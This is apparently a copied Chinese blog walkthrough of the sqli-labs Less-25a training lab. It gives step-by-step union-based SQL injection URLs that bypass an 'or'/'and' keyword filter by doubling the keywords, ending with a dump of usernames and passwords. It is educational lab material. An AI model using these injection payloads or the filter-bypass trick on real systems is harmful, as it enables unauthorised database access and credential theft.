当前位置: 首页 > article >正文

sqli-labs less-25a

article 2024/10/20 15:41:38

Sqli-labs less-25a

在这里插入图片描述

判断注入类型,列数及注入点

构造

http://192.168.140.130/sq/Less-25a/?id=1
回显正常

http://192.168.140.130/sq/Less-25a/?id=1’
报错

构造

http://192.168.140.130/sq/Less-25a/?id=1 and 1=1
回显正常
http://192.168.140.130/sq/Less-25a/?id=1 and 1=1
报错

确定为数字型注入

http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 1
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 2
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 3
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 4
4的时候报错,确定列数为3

构造

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,2,3

确定注入点2,3

爆数据

数据库名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select database()),3

表名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3
注意informatrion中or字符的绕过
在这里插入图片描述

列名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name=‘users’),3
注意or与and字符绕过
在这里插入图片描述

数据

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(username,‘~’,passwoorrd) from security.users),3
==注意password字符中or的绕过
在这里插入图片描述

*** OVER!***


http://www.kler.cn/news/357472.html

相关文章:

  • 单片机的寻址方式有哪些?
  • 创建虚拟机并安装操作系统
  • 贪心day4
  • 【人工智能-初级】第9章 神经网络的基础:理解感知器与激活函数
  • qt项目使用其他项目的ui之单继承之成员变量
  • Cookie与Session的区别(特别详细)
  • C++学习路线(十六)
  • [论文阅读]: Detecting Copyrighted Content in Language Models Training Data
  • 【python】OpenCV—Fourier Transform
  • 十一、SQL 优化:提升数据库性能的关键技巧与实例讲解
  • MongoDB 的优点和缺点
  • 探索YOLO v11:3D人工智能的RGB-D视觉革命
  • 深度解析 Redis 存储结构及其高效性背后的机制
  • 放眼全球:在竞争激烈的当下,海外媒体发稿何以备受关注?
  • UDP协议和TCP协议
  • 常见网络钓鱼类型
  • 【深度学习|地学应用】Aerosol——宏观层面分析地震气溶胶异常——采用 HYSPLIT-4模型模拟地震AOD异常的水平和垂直后向轨迹
  • IDEA中的快捷键大全--超详细
  • UltraISO(软碟通)制作U盘制作Ubuntu20.04启动盘
  • SQLI LABS | Less-2 GET-Error based-Intiger based